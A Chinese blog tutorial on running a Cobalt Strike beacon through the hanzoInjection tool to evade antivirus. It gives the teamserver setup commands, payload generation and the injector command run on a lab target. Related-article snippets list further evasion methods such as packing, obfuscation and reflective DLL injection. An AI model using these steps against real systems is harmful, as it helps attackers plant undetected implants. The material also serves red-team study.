Cobalt Strike使用hanzolnjection的免杀

最新推荐文章于 2024-06-10 09:55:46 发布
最新推荐文章于 2024-06-10 09:55:46 发布
阅读量642 收藏 2
点赞数
分类专栏: 免杀 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45495060/article/details/120010138
版权

使用hanzolnjection的免杀

一、介绍:

Hanzoinjection介绍

对于免杀,我们也可以使用cs生成一个二进制格式的payload,也就是raw格式,运行时我们需要借助hanzolnjection , HanzoIjection 是一种工具,专注于在内存中注入任意代码。 

地址:https://github.com/P0cL4bs/hanzoInjection

命令解析:

-e 跟上生成的bin文件即可 -p -o 输出的位置/名字 -h 帮助

二、安装

1.首先在window中准备一个java10.0的环境

然后运行这个cobaltstrike.bat

1610279124_5ffae8d43387404418891.png!small

2.在本地kali或者在vps操作

将Cobalt Strike文件夹拖拽进kali或者vps中

找到这个文件然后给到执行权限

chmod +x teamserver

然后再创建一个链接,ip为kali或者vps的主机地址,123456为密码

./teamserver 192.168.0.128 123456

链接 

ip为kali或者vps地址

端口是固定的:50050

用户名为空

密码是刚才设置的:123456

1610279222_5ffae93635fce97018b95.png!small

发现链接成功

1610279272_5ffae968097ac3ed6a671.png!small

四、复现 

1.生成payload

x64不要勾选,你攻击的系统不论是32还是64这个都不要勾选

 

生成到桌面

1616331811_605744236b6dffb100a49.png!small?1616331809595

 2.将生成的bin文件和放到hanzolnjection文件夹里面,一起上传到靶机上面进行执行

执行命令

hanzolnjection.exe -e payload.bin

发现成功上线

 

 

 

 

一笼管汤包
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BadUSB简单免杀一秒上线CobaltStrike.pdf
03-24
BadUSB简单免杀一秒上线CobaltStrike.pdf
CobaltStrike使用插件实现免杀
m0_74025111的博客
04-24 519
免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。
探秘HanzoInjection:突破传统防病毒的代码注入工具
最新发布
gitblog_00084的博客
06-10 366
探秘HanzoInjection:突破传统防病毒的代码注入工具 项目地址:https://gitcode.com/P0cL4bs/hanzoInjection 1. 项目介绍 在信息安全领域中,绕过传统的反病毒解决方案是一项艰巨的任务。而HanzoInjection,由开发者Mharcos Nesster(mh4x0f)精心打造,正是一款专注于内存中任意代码注入的工具,旨在为安全研究人员和开发人员...
CobaltStrike使用-第九篇-免杀
Love&Share
12-08 7168
本篇将会介绍CS payload免杀工具的使用 文章目录杀毒软件杀软常见扫描方式杀软扫描引擎常见免杀技术免杀工具使用HanzoInjectionInvoke-PSImagePython脚本封装Artifact KitVeil Evasion免杀插件 常规杀毒软件的目的就是发现已知病毒并中止删除它,而作为攻击者则需要对病毒文件进行免杀处理,从而使杀毒软件认为我们的文件是合法文件 杀毒软件 杀软常见扫描方式 扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。 程序窜改防护:即是避免恶意程序借由删除杀.
简单的免杀流程,软件使用方法与一点思路(Cobalt-strike
weixin_74182283的博客
04-04 1706
字面意思,就是恶意软件或者木马,通过对其进行修改,导致杀毒软件扫描时会默认这款恶意软件是个安全的软件,导致恶意软件成功上传到电脑。通常在渗透测试的过程中,想要进入别人内网,就需要通过一些木马或者一些程序上传至别人内网,从而得到对方内网的权限。正常情况下,linux内可能没啥杀毒软件,但windows系统下的杀毒软件就各种各样,而我们的木马刚传上去就会被杀掉,这时如果懂得如何去对上传的马做一个免杀,使其顺利通过防火墙就显得非常重要了。
CobaltStrike二次开发环境准备以及免杀
r250414958的博客
05-08 7080
文章目录前言一、环境二、过程1.注册Idea2.原版CobaltStrike3.开始反编译4.新建项目5.配置项目6.去除暗桩7.免杀CobaltStrike免杀其他免杀profile file重写Stager和Beacon参考总结 前言 原版的CobaltStrike已经被各大杀毒软件给标记了,就算变换profile,stage和beacon也存在着许多特征,所以只能想办法来隐藏和去除,二次编译CobaltStrike就是一个很好的办法。 一、环境 win7_x64 jdk-11.0.14 Idea.2
CobaltStrike4.4.zip
09-15
`update.bat`通常用于更新Cobalt Strike到最新版本,确保使用者始终能够利用最新的特性和修复。 `.cobaltstrike.beacon_keys`文件可能包含Cobalt Strike Beacon的密钥,Beacon是Cobalt Strike的代理组件,它在目标...
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
Cobalt_Strike_beacon免杀上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
一分钟免杀cobaltstrike.pdf
11-26
【描述】:本文将深入探讨如何使用Nim语言实现CobaltStrike免杀技术,包括Nim语言的特点、安装配置、编译工具以及免杀过程。 【标签】:Nim语言、CobaltStrike免杀、渗透测试、内网安全、代码 正文: Cobalt ...
cobalt strike 4.7
06-07
为了充分利用Cobalt Strike 4.7,使用者需要对网络攻击的生命周期有深入理解,包括侦察、持久化、权限提升、防御规避、凭证访问、横向移动、收集和外联。此外,熟悉相关的操作系统和网络协议知识,以及基本的编程和...
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1905
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
Cobaltstrike安装,免杀使用
逆向萌新的博客
07-06 1298
Cobaltstrike安装,免杀使用
Cobalt Strike免杀(完结)
qq_32445755的博客
04-18 683
多字节 XOR 或 AES 加密的 shellcode 生成payload 环境 linux python2 工具ShellcodeWrapper 查看python位置 python -c "import sys; print sys.executable" pip2 安装 # 安装setuptools wget https://pypi.python.org/packages/source/s/setuptools/setuptools-18.5.tar.gz tar ..
cobaltstrike的shellcode免杀
qq_45414878的博客
02-02 1829
本项目是基于学习shellcode原理和免杀基础而编写,利用加密、缩小体积、混淆等方式绕过检测,主要是为了应付火绒和360。
Cobalt Strike一些简单免杀 payload
m0_58596609的博客
12-07 723
Cobalt Strike一些简单免杀 payload
Cobalt Strike Veil 免杀过杀软(子篇10)
yyj1781572的博客
11-23 352
Cobalt Strike Veil 免杀过杀软
Cobalt Strike(十五)使用多种方法免杀 payload
qq_56426046的博客
09-26 1345
hanzoijection是一个工具,它专注于在内存中注入任意代码,以绕过常见的防病毒解决方案下载地址。
第六章-11 使用hanzolnjection免杀
划水的小白白
11-27 198
0.1 说明 本文所有内容仅仅用于信息安全方面技术交流, 请读者切勿用于其他用途!!! 0.2 什么是hanzolnjection 一句话总结就是,hanzolnjection可以把CS生成的二进制payload加载到内存中执行。 注意的是,此工具目前在github已经下架了。 一、 启动CS 二、 创建监听 三、 生成payload 注意的是,有时候64位会提示一个错误。32位的兼容性相对好点。 四、 模拟受害者进行允许 这篇文章的方法就很简单粗暴有效。 ...
Cobalt Strike 免杀 python
07-20
对于 Cobalt Strike免杀技术,目前有很多方法可以实现。以下是一种使用 Python 的方法: 1. 首先,使用 Python 的 PyInstaller 或者 Py2exe 等工具将 Cobalt Strike 的主程序进行打包成可执行文件。 2. 接下来,可以使用 PyArmor 或者 Cython 等工具对可执行文件进行加密和混淆,增加反编译难度。 3. 使用 Pyinstaller 的 --onefile 参数,将所有依赖库打包到一个单独的可执行文件中,减少被杀软件检测到的可能性。 4. 通过修改 Cobalt Strike 的代码,或者使用其他的代码混淆工具进行代码混淆,使其难以被静态分析。 5. 可以使用 Shellcode 或者 Reflective DLL Injection 等技术将 Cobalt Strike 主程序加载到内存中运行,避免在磁盘上留下可疑的文件。 6. 可以使用加壳工具对 Cobalt Strike 进行加壳,增加静态分析和动态分析的难度。 需要注意的是,免杀技术并不能保证绝对的免杀效果,因为杀软厂商会不断更新他们的规则和算法。因此,保持及时更新和使用多种免杀技术组合的方法是更可靠的选择。同时,请遵守法律法规,合法使用相关技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值